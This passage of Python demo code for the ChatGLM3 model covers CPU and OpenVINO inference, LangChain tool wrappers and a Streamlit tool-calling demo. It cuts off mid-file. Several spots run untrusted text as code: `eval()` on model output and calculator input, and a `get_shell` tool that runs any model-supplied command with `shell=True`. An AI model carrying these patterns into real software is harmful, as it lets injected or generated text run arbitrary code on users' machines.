:param value: :return: """ return value and 'get_' in value if __name__ == "__main__": # Load LLM tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, load_in_4bit=True, trust_remote_code=True) # load Embedding # embedding_model = SentenceTransformer(EMBEDDING_PATH, device="cuda") uvicorn.run(app, host='0.0.0.0', port=8000, workers=1) File: Intel_device_demo/ipex_llm_cpu_demo/utils.py import gc import json import torch from transformers import PreTrainedModel, PreTrainedTokenizer from transformers.generation.logits_process import LogitsProcessor from typing import Union, Tuple class InvalidScoreLogitsProcessor(LogitsProcessor): def __call__( self, input_ids: torch.LongTensor, scores: torch.FloatTensor ) -> torch.FloatTensor: if torch.isnan(scores).any() or torch.isinf(scores).any(): scores.zero_() scores[..., 5] = 5e4 return scores def process_response(output: str, use_tool: bool = False) -> Union[str, dict]: content = "" for response in output.split("<|assistant|>"): metadata, content = response.split("\n", maxsplit=1) if not metadata.strip(): content = content.strip() content = content.replace("[[训练时间]]", "2023年") else: if use_tool: content = "\n".join(content.split("\n")[1:-1]) def tool_call(**kwargs): return kwargs parameters = eval(content) content = { "name": metadata.strip(), "arguments": json.dumps(parameters, ensure_ascii=False) } else: content = { "name": metadata.strip(), "content": content } return content @torch.inference_mode() def generate_stream_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): messages = params["messages"] tools = params["tools"] temperature = float(params.get("temperature", 1.0)) repetition_penalty = float(params.get("repetition_penalty", 1.0)) top_p = float(params.get("top_p", 1.0)) max_new_tokens = int(params.get("max_tokens", 256)) echo = params.get("echo", True) messages = process_chatglm_messages(messages, tools=tools) query, role = messages[-1]["content"], messages[-1]["role"] inputs = tokenizer.build_chat_input(query, history=messages[:-1], role=role) inputs = inputs.to(model.device) input_echo_len = len(inputs["input_ids"][0]) if input_echo_len >= model.config.seq_length: print(f"Input length larger than {model.config.seq_length}") eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), ] gen_kwargs = { "max_new_tokens": max_new_tokens, "do_sample": True if temperature > 1e-5 else False, "top_p": top_p, "repetition_penalty": repetition_penalty, "logits_processor": [InvalidScoreLogitsProcessor()], } if temperature > 1e-5: gen_kwargs["temperature"] = temperature total_len = 0 for total_ids in model.stream_generate(**inputs, eos_token_id=eos_token_id, **gen_kwargs): total_ids = total_ids.tolist()[0] total_len = len(total_ids) if echo: output_ids = total_ids[:-1] else: output_ids = total_ids[input_echo_len:-1] response = tokenizer.decode(output_ids) if response and response[-1] != "�": response, stop_found = apply_stopping_strings(response, ["<|observation|>"]) yield { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": "function_call" if stop_found else None, } if stop_found: break # Only last stream result contains finish_reason, we set finish_reason as stop ret = { "text": response, "usage": { "prompt_tokens": input_echo_len, "completion_tokens": total_len - input_echo_len, "total_tokens": total_len, }, "finish_reason": 
"stop", } yield ret gc.collect() torch.cuda.empty_cache() def process_chatglm_messages(messages, tools=None): _messages = messages messages = [] if tools: messages.append( { "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools } ) for m in _messages: role, content, func_call = m.role, m.content, m.function_call if role == "function": messages.append( { "role": "observation", "content": content } ) elif role == "assistant" and func_call is not None: for response in content.split("<|assistant|>"): metadata, sub_content = response.split("\n", maxsplit=1) messages.append( { "role": role, "metadata": metadata, "content": sub_content.strip() } ) else: messages.append({"role": role, "content": content}) return messages def generate_chatglm3(model: PreTrainedModel, tokenizer: PreTrainedTokenizer, params: dict): for response in generate_stream_chatglm3(model, tokenizer, params): pass return response def apply_stopping_strings(reply, stop_strings) -> Tuple[str, bool]: stop_found = False for string in stop_strings: idx = reply.find(string) if idx != -1: reply = reply[:idx] stop_found = True break if not stop_found: # If something like "\nYo" is generated just before "\nYou: is completed, trim it for string in stop_strings: for j in range(len(string) - 1, 0, -1): if reply[-j:] == string[:j]: reply = reply[:-j] break else: continue break return reply, stop_found File: Intel_device_demo/ipex_llm_cpu_demo/openai_api_request.py """ This script is an example of using the OpenAI API to create various interactions with a ChatGLM3 model. It includes functions to: 1. Conduct a basic chat session, asking about weather conditions in multiple cities. 2. Initiate a simple chat in Chinese, asking the model to tell a short story. 3. Retrieve and print embeddings for a given text input. Each function demonstrates a different aspect of the API's capabilities, showcasing how to make requests and handle responses. """ from openai import OpenAI import time base_url = "http://127.0.0.1:8000/v1/" client = OpenAI(api_key="EMPTY", base_url=base_url) def function_chat(): messages = [{"role": "user", "content": "What's the weather like in San Francisco, Tokyo, and Paris?"}] tools = [ { "type": "function", "function": { "name": "get_current_weather", "description": "Get the current weather in a given location", "parameters": { "type": "object", "properties": { "location": { "type": "string", "description": "The city and state, e.g. San Francisco, CA", }, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, }, "required": ["location"], }, }, } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, tools=tools, tool_choice="auto", ) if response: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) def simple_chat(use_stream=True): messages = [ { "role": "system", "content": "You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's " "instructions carefully. 
Respond using markdown.", }, { "role": "user", "content": "你好,请你用生动的话语给我讲一个小故事吧" } ] response = client.chat.completions.create( model="chatglm3-6b", messages=messages, stream=use_stream, max_tokens=256, temperature=0.8, presence_penalty=1.1, top_p=0.8) if response: if use_stream: for chunk in response: print(chunk.choices[0].delta.content) else: content = response.choices[0].message.content print(content) else: print("Error:", response.status_code) if __name__ == "__main__": simple_chat(use_stream=False) simple_chat(use_stream=True) File: Intel_device_demo/openvino_demo/openvino_cli_demo.py import argparse from typing import List, Tuple from threading import Thread import torch from optimum.intel.openvino import OVModelForCausalLM from transformers import (AutoTokenizer, AutoConfig, TextIteratorStreamer, StoppingCriteriaList, StoppingCriteria) def parse_text(text): lines = text.split("\n") lines = [line for line in lines if line != ""] count = 0 for i, line in enumerate(lines): if "```" in line: count += 1 items = line.split('`') if count % 2 == 1: lines[i] = f'<pre><code class="language-{items[-1]}">' else: lines[i] = f'<br></code></pre>' else: if i > 0: if count % 2 == 1: line = line.replace("`", "\`") line = line.replace("<", "&lt;") line = line.replace(">", "&gt;") line = line.replace(" ", "&nbsp;") line = line.replace("*", "&ast;") line = line.replace("_", "&lowbar;") line = line.replace("-", "&#45;") line = line.replace(".", "&#46;") line = line.replace("!", "&#33;") line = line.replace("(", "&#40;") line = line.replace(")", "&#41;") line = line.replace("$", "&#36;") lines[i] = "<br>" + line text = "".join(lines) return text class StopOnTokens(StoppingCriteria): def __init__(self, token_ids): self.token_ids = token_ids def __call__( self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs ) -> bool: for stop_id in self.token_ids: if input_ids[0][-1] == stop_id: return True return False if __name__ == "__main__": parser = argparse.ArgumentParser(add_help=False) parser.add_argument('-h', '--help', action='help', help='Show this help message and exit.') parser.add_argument('-m', '--model_path', required=True, type=str, help='Required. model path') parser.add_argument('-l', '--max_sequence_length', default=256, required=False, type=int, help='Required. maximun length of output') parser.add_argument('-d', '--device', default='CPU', required=False, type=str, help='Required. 
device for inference') args = parser.parse_args() model_dir = args.model_path ov_config = {"PERFORMANCE_HINT": "LATENCY", "NUM_STREAMS": "1", "CACHE_DIR": ""} tokenizer = AutoTokenizer.from_pretrained( model_dir, trust_remote_code=True) print("====Compiling model====") ov_model = OVModelForCausalLM.from_pretrained( model_dir, device=args.device, ov_config=ov_config, config=AutoConfig.from_pretrained(model_dir, trust_remote_code=True), trust_remote_code=True, ) streamer = TextIteratorStreamer( tokenizer, timeout=60.0, skip_prompt=True, skip_special_tokens=True ) stop_tokens = [0, 2] stop_tokens = [StopOnTokens(stop_tokens)] def convert_history_to_token(history: List[Tuple[str, str]]): messages = [] for idx, (user_msg, model_msg) in enumerate(history): if idx == len(history) - 1 and not model_msg: messages.append({"role": "user", "content": user_msg}) break if user_msg: messages.append({"role": "user", "content": user_msg}) if model_msg: messages.append({"role": "assistant", "content": model_msg}) model_inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=True, return_tensors="pt") return model_inputs history = [] print("====Starting conversation====") while True: input_text = input("用户: ") if input_text.lower() == 'stop': break if input_text.lower() == 'clear': history = [] print("AI助手: 对话历史已清空") continue print("ChatGLM3-6B-OpenVINO:", end=" ") history = history + [[parse_text(input_text), ""]] model_inputs = convert_history_to_token(history) generate_kwargs = dict( input_ids=model_inputs, max_new_tokens=args.max_sequence_length, temperature=0.1, do_sample=True, top_p=1.0, top_k=50, repetition_penalty=1.1, streamer=streamer, stopping_criteria=StoppingCriteriaList(stop_tokens) ) t1 = Thread(target=ov_model.generate, kwargs=generate_kwargs) t1.start() partial_text = "" for new_text in streamer: new_text = new_text print(new_text, end="", flush=True) partial_text += new_text print("\n") history[-1][1] = partial_text File: langchain_demo/ChatGLM3.py import ast import json from langchain.llms.base import LLM from transformers import AutoTokenizer, AutoModel, AutoConfig from typing import List, Optional class ChatGLM3(LLM): max_token: int = 8192 do_sample: bool = True temperature: float = 0.8 top_p = 0.8 tokenizer: object = None model: object = None history: List = [] has_search: bool = False def __init__(self): super().__init__() @property def _llm_type(self) -> str: return "ChatGLM3" def load_model(self, model_name_or_path=None): model_config = AutoConfig.from_pretrained( model_name_or_path, trust_remote_code=True ) self.tokenizer = AutoTokenizer.from_pretrained( model_name_or_path, trust_remote_code=True ) self.model = AutoModel.from_pretrained( model_name_or_path, config=model_config, trust_remote_code=True, device_map="auto").eval() def _tool_history(self, prompt: str): ans = [] tool_prompts = prompt.split( "You have access to the following tools:\n\n")[1].split("\n\nUse a json blob")[0].split("\n") tools_json = [] for tool_desc in tool_prompts: name = tool_desc.split(":")[0] description = tool_desc.split(", args:")[0].split(":")[0].strip() parameters_str = tool_desc.split("args:")[1].strip() parameters_dict = ast.literal_eval(parameters_str) params_cleaned = {} for param, details in parameters_dict.items(): params_cleaned[param] = {'description': details['description'], 'type': details['type']} tools_json.append({ "name": name, "description": description, "parameters": params_cleaned }) ans.append({ "role": "system", "content": "Answer the following 
questions as best as you can. You have access to the following tools:", "tools": tools_json }) dialog_parts = prompt.split("Human: ") for part in dialog_parts[1:]: if "\nAI: " in part: user_input, ai_response = part.split("\nAI: ") ai_response = ai_response.split("\n")[0] else: user_input = part ai_response = None ans.append({"role": "user", "content": user_input.strip()}) if ai_response: ans.append({"role": "assistant", "content": ai_response.strip()}) query = dialog_parts[-1].split("\n")[0] return ans, query def _extract_observation(self, prompt: str): return_json = prompt.split("Observation: ")[-1].split("\nThought:")[0] self.history.append({ "role": "observation", "content": return_json }) return def _extract_tool(self): if len(self.history[-1]["metadata"]) > 0: metadata = self.history[-1]["metadata"] content = self.history[-1]["content"] lines = content.split('\n') for line in lines: if 'tool_call(' in line and ')' in line and self.has_search is False: # 获取括号内的字符串 params_str = line.split('tool_call(')[-1].split(')')[0] # 解析参数对 params_pairs = [param.split("=") for param in params_str.split(",") if "=" in param] params = {pair[0].strip(): pair[1].strip().strip("'\"") for pair in params_pairs} action_json = { "action": metadata, "action_input": params } self.has_search = True print("*****Action*****") print(action_json) print("*****Answer*****") return f""" Action: ``` {json.dumps(action_json, ensure_ascii=False)} ```""" final_answer_json = { "action": "Final Answer", "action_input": self.history[-1]["content"] } self.has_search = False return f""" Action: ``` {json.dumps(final_answer_json, ensure_ascii=False)} ```""" def _call(self, prompt: str, history: List = [], stop: Optional[List[str]] = ["<|user|>"]): if not self.has_search: self.history, query = self._tool_history(prompt) else: self._extract_observation(prompt) query = "" _, self.history = self.model.chat( self.tokenizer, query, history=self.history, do_sample=self.do_sample, max_length=self.max_token, temperature=self.temperature, ) response = self._extract_tool() history.append((prompt, response)) return response File: langchain_demo/main.py """ This script demonstrates the use of the LangChain's StructuredChatAgent and AgentExecutor alongside various tools The script utilizes the ChatGLM3 model, a large language model for understanding and generating human-like text. The model is loaded from a specified path and integrated into the chat agent. Tools: - Calculator: Performs arithmetic calculations. - Weather: Provides weather-related information based on input queries. - DistanceConverter: Converts distances between meters, kilometers, and feet. The agent operates in three modes: 1. Single Parameter without History: Uses Calculator to perform simple arithmetic. 2. Single Parameter with History: Uses Weather tool to answer queries about temperature, considering the conversation history. 3. Multiple Parameters without History: Uses DistanceConverter to convert distances between specified units. 4. Single use Langchain Tool: Uses Arxiv tool to search for scientific articles. Note: The model calling tool fails, which may cause some errors or inability to execute. Try to reduce the temperature parameters of the model, or reduce the number of tools, especially the third function. The success rate of multi-parameter calling is low. 
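One way to lower the sampling temperature (the value below is illustrative, not tuned):

    llm = ChatGLM3()
    llm.load_model(MODEL_PATH)
    llm.temperature = 0.1  # ChatGLM3._call passes this attribute straight to model.chat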
The following errors may occur: Required fields [type=missing, input_value={'distance': '30', 'unit': 'm', 'to': 'km'}, input_type=dict] The model illusion in this case generates parameters that do not meet the requirements. The top_p and temperature parameters of the model should be adjusted to better solve such problems. Success example: *****Action***** { 'action': 'weather', 'action_input': { 'location': '厦门' } } *****Answer***** { 'input': '厦门比北京热吗?', 'chat_history': [HumanMessage(content='北京温度多少度'), AIMessage(content='北京现在12度')], 'output': '根据最新的天气数据,厦门今天的气温为18度,天气晴朗。而北京今天的气温为12度。所以,厦门比北京热。' } **************** """ import os from langchain import hub from langchain.agents import AgentExecutor, create_structured_chat_agent, load_tools from langchain_core.messages import AIMessage, HumanMessage from ChatGLM3 import ChatGLM3 from tools.Calculator import Calculator from tools.Weather import Weather from tools.DistanceConversion import DistanceConverter MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') if __name__ == "__main__": llm = ChatGLM3() llm.load_model(MODEL_PATH) prompt = hub.pull("hwchase17/structured-chat-agent") # for single parameter without history tools = [Calculator()] agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke({"input": "34 * 34"}) print(ans) # for singe parameter with history tools = [Weather()] agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke( { "input": "厦门比北京热吗?", "chat_history": [ HumanMessage(content="北京温度多少度"), AIMessage(content="北京现在12度"), ], } ) print(ans) # for multiple parameters without history tools = [DistanceConverter()] agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke({"input": "how many meters in 30 km?"}) print(ans) # for using langchain tools tools = load_tools(["arxiv"], llm=llm) agent = create_structured_chat_agent(llm=llm, tools=tools, prompt=prompt) agent_executor = AgentExecutor(agent=agent, tools=tools) ans = agent_executor.invoke({"input": "Describe the paper about GLM 130B"}) print(ans) File: langchain_demo/tools/Weather.py import os import requests from typing import Type, Any from langchain.tools import BaseTool from pydantic import BaseModel, Field class WeatherInput(BaseModel): location: str = Field(description="the location need to check the weather") class Weather(BaseTool): name = "weather" description = "Use for searching weather at a specific location" args_schema: Type[BaseModel] = WeatherInput def __init__(self): super().__init__() def _run(self, location: str) -> dict[str, Any]: api_key = os.environ["SENIVERSE_KEY"] url = f"https://api.seniverse.com/v3/weather/now.json?key={api_key}&location={location}&language=zh-Hans&unit=c" response = requests.get(url) if response.status_code == 200: data = response.json() weather = { "temperature": data["results"][0]["now"]["temperature"], "description": data["results"][0]["now"]["text"], } return weather else: raise Exception( f"Failed to retrieve weather: {response.status_code}") File: langchain_demo/tools/Calculator.py import abc import re from typing import Type from langchain.tools import BaseTool from pydantic import BaseModel, Field class CalculatorInput(BaseModel): calculation: str = Field(description="calculation to perform") class 
Calculator(BaseTool, abc.ABC): name = "Calculator" description = "Useful for when you need to calculate math problems" args_schema: Type[BaseModel] = CalculatorInput def __init__(self): super().__init__() def parameter_validation(self, para: str): """ You can write your own parameter validation rules here, you can refer to the code given here. :param para: :return: """ symbols = ["math", "sqrt", "log", "sin", "cos", "tan", "pi"] for sym in symbols: para = para.replace(sym, "") patten = re.compile("[+*/\-%\d()=\s.]{3,}") if re.findall(patten, para): return True def _run(self, calculation: str) -> str: calculation = calculation.replace("^", "**") if "sqrt" in calculation and "math" not in calculation: calculation = calculation.replace("sqrt", "math.sqrt") if "log" in calculation and "math" not in calculation: calculation = calculation.replace("log", "math.log") if "sin" in calculation and "math" not in calculation: calculation = calculation.replace("sin", "math.sin") if "cos" in calculation and "math" not in calculation: calculation = calculation.replace("cos", "math.cos") if "tan" in calculation and "math" not in calculation: calculation = calculation.replace("tan", "math.tan") if "pi" in calculation and "math" not in calculation: calculation = calculation.replace("pi", "math.pi") if "pI" in calculation and "math" not in calculation: calculation = calculation.replace("pI", "math.pi") if "PI" in calculation and "math" not in calculation: calculation = calculation.replace("PI", "math.pi") if "Pi" in calculation and "math" not in calculation: calculation = calculation.replace("Pi", "math.pi") return eval(calculation) File: langchain_demo/tools/DistanceConversion.py import abc from typing import Type from langchain.tools import BaseTool from pydantic import BaseModel, Field class DistanceConversionInput(BaseModel): distance: float = Field(description="The numerical value of the distance to convert") unit: str = Field(description="The current unit of the distance (m, km, or feet)") to_unit: str = Field(description="The target unit to convert the distance into (m, km, or feet)") class DistanceConverter(BaseTool, abc.ABC): name = "DistanceConverter" description = "Converts distance between meters, kilometers, and feet" args_schema: Type[BaseModel] = DistanceConversionInput def __init__(self): super().__init__() def _run(self, distance: float, unit: str, to_unit: str) -> str: unit_conversions = { "m_to_km": 0.001, "km_to_m": 1000, "feet_to_m": 0.3048, "m_to_feet": 3.28084, "km_to_feet": 3280.84, "feet_to_km": 0.0003048 } if unit == to_unit: return f"{distance} {unit} is equal to {distance} {to_unit}" if unit == "km": distance *= unit_conversions["km_to_m"] elif unit == "feet": distance *= unit_conversions["feet_to_m"] if to_unit == "km": converted_distance = distance * unit_conversions["m_to_km"] elif to_unit == "feet": converted_distance = distance * unit_conversions["m_to_feet"] else: converted_distance = distance # already in meters if this block is reached return f"{distance} {unit} is equal to {converted_distance} {to_unit}" File: composite_demo/conversation.py from dataclasses import dataclass from enum import auto, Enum import json from PIL.Image import Image import streamlit as st from streamlit.delta_generator import DeltaGenerator TOOL_PROMPT = 'Answer the following questions as best as you can. 
You have access to the following tools:\n' class Role(Enum): SYSTEM = auto() USER = auto() ASSISTANT = auto() TOOL = auto() INTERPRETER = auto() OBSERVATION = auto() def __str__(self): match self: case Role.SYSTEM: return "<|system|>" case Role.USER: return "<|user|>" case Role.ASSISTANT | Role.TOOL | Role.INTERPRETER: return "<|assistant|>" case Role.OBSERVATION: return "<|observation|>" # Get the message block for the given role def get_message(self): # Compare by value here, because the enum object in the session state # is not the same as the enum cases here, due to streamlit's rerunning # behavior. match self.value: case Role.SYSTEM.value: return case Role.USER.value: return st.chat_message(name="user", avatar="user") case Role.ASSISTANT.value: return st.chat_message(name="assistant", avatar="assistant") case Role.TOOL.value: return st.chat_message(name="tool", avatar="assistant") case Role.INTERPRETER.value: return st.chat_message(name="interpreter", avatar="assistant") case Role.OBSERVATION.value: return st.chat_message(name="observation", avatar="user") case _: st.error(f'Unexpected role: {self}') @dataclass class Conversation: role: Role content: str tool: str | None = None image: Image | None = None def __str__(self) -> str: print(self.role, self.content, self.tool) match self.role: case Role.SYSTEM | Role.USER | Role.ASSISTANT | Role.OBSERVATION: return f'{self.role}\n{self.content}' case Role.TOOL: return f'{self.role}{self.tool}\n{self.content}' case Role.INTERPRETER: return f'{self.role}interpreter\n{self.content}' # Human readable format def get_text(self) -> str: text = postprocess_text(self.content) match self.role.value: case Role.TOOL.value: text = f'Calling tool `{self.tool}`:\n\n{text}' case Role.INTERPRETER.value: text = f'{text}' case Role.OBSERVATION.value: text = f'Observation:\n```\n{text}\n```' return text # Display as a markdown block def show(self, placeholder: DeltaGenerator | None=None) -> str: if placeholder: message = placeholder else: message = self.role.get_message() if self.image: message.image(self.image) else: text = self.get_text() message.markdown(text) def preprocess_text( system: str | None, tools: list[dict] | None, history: list[Conversation], ) -> str: if tools: tools = json.dumps(tools, indent=4, ensure_ascii=False) prompt = f"{Role.SYSTEM}\n" prompt += system if not tools else TOOL_PROMPT if tools: tools = json.loads(tools) prompt += json.dumps(tools, ensure_ascii=False) for conversation in history: prompt += f'{conversation}' prompt += f'{Role.ASSISTANT}\n' return prompt def postprocess_text(text: str) -> str: text = text.replace("\(", "$") text = text.replace("\)", "$") text = text.replace("\[", "$$") text = text.replace("\]", "$$") text = text.replace("<|assistant|>", "") text = text.replace("<|observation|>", "") text = text.replace("<|system|>", "") text = text.replace("<|user|>", "") return text.strip() File: composite_demo/client.py from __future__ import annotations import os import streamlit as st import torch from collections.abc import Iterable from typing import Any, Protocol from huggingface_hub.inference._text_generation import TextGenerationStreamResponse, Token from transformers import AutoModel, AutoTokenizer, AutoConfig from transformers.generation.logits_process import LogitsProcessor from transformers.generation.utils import LogitsProcessorList from conversation import Conversation TOOL_PROMPT = 'Answer the following questions as best as you can. 
You have access to the following tools:' MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') PT_PATH = os.environ.get('PT_PATH', None) PRE_SEQ_LEN = int(os.environ.get("PRE_SEQ_LEN", 128)) TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) @st.cache_resource def get_client() -> Client: client = HFClient(MODEL_PATH, TOKENIZER_PATH, PT_PATH) return client class Client(Protocol): def generate_stream(self, system: str | None, tools: list[dict] | None, history: list[Conversation], **parameters: Any ) -> Iterable[TextGenerationStreamResponse]: ... def stream_chat( self, tokenizer, query: str, history: list[tuple[str, str]] = None, role: str = "user", past_key_values=None, max_new_tokens: int = 256, do_sample=True, top_p=0.8, temperature=0.8, repetition_penalty=1.0, length_penalty=1.0, num_beams=1, logits_processor=None, return_past_key_values=False, **kwargs ): class InvalidScoreLogitsProcessor(LogitsProcessor): def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor) -> torch.FloatTensor: if torch.isnan(scores).any() or torch.isinf(scores).any(): scores.zero_() scores[..., 5] = 5e4 return scores if history is None: history = [] print("\n== Input ==\n", query) print("\n==History==\n", history) if logits_processor is None: logits_processor = LogitsProcessorList() logits_processor.append(InvalidScoreLogitsProcessor()) eos_token_id = [tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), tokenizer.get_command("<|observation|>")] gen_kwargs = {"max_new_tokens": max_new_tokens, "do_sample": do_sample, "top_p": top_p, "temperature": temperature, "logits_processor": logits_processor, "repetition_penalty": repetition_penalty, "length_penalty": length_penalty, "num_beams": num_beams, **kwargs } if past_key_values is None: inputs = tokenizer.build_chat_input(query, history=history, role=role) else: inputs = tokenizer.build_chat_input(query, role=role) inputs = inputs.to(self.device) if past_key_values is not None: past_length = past_key_values[0][0].shape[0] if self.transformer.pre_seq_len is not None: past_length -= self.transformer.pre_seq_len inputs.position_ids += past_length attention_mask = inputs.attention_mask attention_mask = torch.cat((attention_mask.new_ones(1, past_length), attention_mask), dim=1) inputs['attention_mask'] = attention_mask history.append({"role": role, "content": query}) input_sequence_length = inputs['input_ids'].shape[1] if input_sequence_length + max_new_tokens >= self.config.seq_length: yield "Current input sequence length {} plus max_new_tokens {} is too long. The maximum model sequence length is {}. You may adjust the generation parameter to enable longer chat history.".format( input_sequence_length, max_new_tokens, self.config.seq_length ), history return if input_sequence_length > self.config.seq_length: yield "Current input sequence length {} exceeds maximum model sequence length {}. 
Unable to generate tokens.".format( input_sequence_length, self.config.seq_length ), history return for outputs in self.stream_generate(**inputs, past_key_values=past_key_values, eos_token_id=eos_token_id, return_past_key_values=return_past_key_values, **gen_kwargs): if return_past_key_values: outputs, past_key_values = outputs outputs = outputs.tolist()[0][len(inputs["input_ids"][0]):] response = tokenizer.decode(outputs) if response and response[-1] != "�": new_history = history if return_past_key_values: yield response, new_history, past_key_values else: yield response, new_history class HFClient(Client): def __init__(self, model_path: str, tokenizer_path: str, pt_checkpoint: str = None): self.model_path = model_path self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_path, trust_remote_code=True) if pt_checkpoint is not None and os.path.exists(pt_checkpoint): config = AutoConfig.from_pretrained( model_path, trust_remote_code=True, pre_seq_len=PRE_SEQ_LEN ) self.model = AutoModel.from_pretrained( model_path, trust_remote_code=True, config=config, device_map="auto").eval() # add .quantize(bits=4, device="cuda").cuda() before .eval() and remove device_map="auto" to use int4 model # must use cuda to load int4 model prefix_state_dict = torch.load(os.path.join(pt_checkpoint, "pytorch_model.bin")) new_prefix_state_dict = {} for k, v in prefix_state_dict.items(): if k.startswith("transformer.prefix_encoder."): new_prefix_state_dict[k[len("transformer.prefix_encoder."):]] = v print("Loaded from pt checkpoints", new_prefix_state_dict.keys()) self.model.transformer.prefix_encoder.load_state_dict(new_prefix_state_dict) else: self.model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() # add .quantize(bits=4, device="cuda").cuda() before .eval() and remove device_map="auto" to use int4 model # must use cuda to load int4 model def generate_stream( self, system: str | None, tools: list[dict] | None, history: list[Conversation], **parameters: Any ) -> Iterable[TextGenerationStreamResponse]: chat_history = [{ 'role': 'system', 'content': system if not tools else TOOL_PROMPT, }] if tools: chat_history[0]['tools'] = tools for conversation in history[:-1]: chat_history.append({ 'role': str(conversation.role).removeprefix('<|').removesuffix('|>'), 'content': conversation.content, }) query = history[-1].content role = str(history[-1].role).removeprefix('<|').removesuffix('|>') text = '' for new_text, _ in stream_chat( self.model, self.tokenizer, query, chat_history, role, **parameters, ): word = new_text.removeprefix(text) word_stripped = word.strip() text = new_text yield TextGenerationStreamResponse( generated_text=text, token=Token( id=0, logprob=0, text=word, special=word_stripped.startswith('<|') and word_stripped.endswith('|>'), ) ) File: composite_demo/tool_registry.py """ This code is the tool registration part. By registering the tool, the model can call the tool. This code provides extended functionality to the model, enabling it to call and interact with a variety of utilities through defined interfaces. 
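Typical flow (the `echo_text` tool below is purely illustrative and is not part of
this module):

    @register_tool
    def echo_text(
        text: Annotated[str, 'The text to echo back', True],
    ) -> str:
        "Return the given text unchanged."
        return text

    print(dispatch_tool("echo_text", {"text": "hello"}))
    print(get_tools())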
""" import copy import inspect from pprint import pformat import traceback from types import GenericAlias from typing import get_origin, Annotated import subprocess _TOOL_HOOKS = {} _TOOL_DESCRIPTIONS = {} def register_tool(func: callable): tool_name = func.__name__ tool_description = inspect.getdoc(func).strip() python_params = inspect.signature(func).parameters tool_params = [] for name, param in python_params.items(): annotation = param.annotation if annotation is inspect.Parameter.empty: raise TypeError(f"Parameter `{name}` missing type annotation") if get_origin(annotation) != Annotated: raise TypeError(f"Annotation type for `{name}` must be typing.Annotated") typ, (description, required) = annotation.__origin__, annotation.__metadata__ typ: str = str(typ) if isinstance(typ, GenericAlias) else typ.__name__ if not isinstance(description, str): raise TypeError(f"Description for `{name}` must be a string") if not isinstance(required, bool): raise TypeError(f"Required for `{name}` must be a bool") tool_params.append({ "name": name, "description": description, "type": typ, "required": required }) tool_def = { "name": tool_name, "description": tool_description, "params": tool_params } print("[registered tool] " + pformat(tool_def)) _TOOL_HOOKS[tool_name] = func _TOOL_DESCRIPTIONS[tool_name] = tool_def return func def dispatch_tool(tool_name: str, tool_params: dict) -> str: if tool_name not in _TOOL_HOOKS: return f"Tool `{tool_name}` not found. Please use a provided tool." tool_call = _TOOL_HOOKS[tool_name] try: ret = tool_call(**tool_params) except: ret = traceback.format_exc() return str(ret) def get_tools() -> dict: return copy.deepcopy(_TOOL_DESCRIPTIONS) # Tool Definitions @register_tool def random_number_generator( seed: Annotated[int, 'The random seed used by the generator', True], range: Annotated[tuple[int, int], 'The range of the generated numbers', True], ) -> int: """ Generates a random number x, s.t. 
range[0] <= x < range[1] """ if not isinstance(seed, int): raise TypeError("Seed must be an integer") if not isinstance(range, tuple): raise TypeError("Range must be a tuple") if not isinstance(range[0], int) or not isinstance(range[1], int): raise TypeError("Range must be a tuple of integers") import random return random.Random(seed).randint(*range) @register_tool def get_weather( city_name: Annotated[str, 'The name of the city to be queried', True], ) -> str: """ Get the current weather for `city_name` """ if not isinstance(city_name, str): raise TypeError("City name must be a string") key_selection = { "current_condition": ["temp_C", "FeelsLikeC", "humidity", "weatherDesc", "observation_time"], } import requests try: resp = requests.get(f"https://wttr.in/{city_name}?format=j1") resp.raise_for_status() resp = resp.json() ret = {k: {_v: resp[k][0][_v] for _v in v} for k, v in key_selection.items()} except: import traceback ret = "Error encountered while fetching weather data!\n" + traceback.format_exc() return str(ret) @register_tool def get_shell( query: Annotated[str, 'The command should run in Linux shell', True], ) -> str: """ Use shell to run command """ if not isinstance(query, str): raise TypeError("Command must be a string") try: result = subprocess.run(query, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) return result.stdout except subprocess.CalledProcessError as e: return e.stderr if __name__ == "__main__": # print(dispatch_tool("get_shell", {"query": "pwd"})) print(get_tools()) File: composite_demo/demo_tool.py import re import yaml from yaml import YAMLError import streamlit as st from streamlit.delta_generator import DeltaGenerator from client import get_client from conversation import postprocess_text, preprocess_text, Conversation, Role from tool_registry import dispatch_tool, get_tools EXAMPLE_TOOL = { "name": "get_current_weather", "description": "Get the current weather in a given location", "parameters": { "type": "object", "properties": { "location": { "type": "string", "description": "The city and state, e.g. San Francisco, CA", }, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}, }, "required": ["location"], } } client = get_client() def tool_call(*args, **kwargs) -> dict: print("=== Tool call===") print(args) print(kwargs) st.session_state.calling_tool = True return kwargs def yaml_to_dict(tools: str) -> list[dict] | None: try: return yaml.safe_load(tools) except YAMLError: return None def extract_code(text: str) -> str: pattern = r'```([^\n]*)\n(.*?)```' matches = re.findall(pattern, text, re.DOTALL) print(matches) return matches[-1][1] # Append a conversation into history, while show it in a new markdown block def append_conversation( 